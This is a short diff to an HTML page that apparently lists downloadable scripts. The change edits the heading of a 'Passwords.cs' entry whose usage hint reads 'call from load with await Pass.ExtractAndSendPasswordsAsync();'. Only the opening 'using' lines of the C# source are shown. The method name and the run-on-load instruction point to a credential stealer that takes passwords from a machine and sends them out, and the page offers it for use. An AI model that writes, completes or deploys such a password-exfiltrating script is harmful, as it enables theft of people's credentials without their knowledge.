--- a/index.html
+++ b/index.html
@@ -149,7 +149,7 @@
 
       <!-- Passwords.cs Script -->
       <div class="script">
-        <h3>Passwords.cs<br /><span style="font-size:0.8em; color:#aaa;">(call from load with await Pass.ExtractAndSendPasswordsAsync();)</span></h3>
+        <h3>Passwords.cs<br /><span style="font-size:0.8em; color:#aaa;">call from load with await Pass.ExtractAndSendPasswordsAsync();</span></h3>
         <textarea id="passwordsScript" readonly>
 using System;
 using System.Collections.Generic;
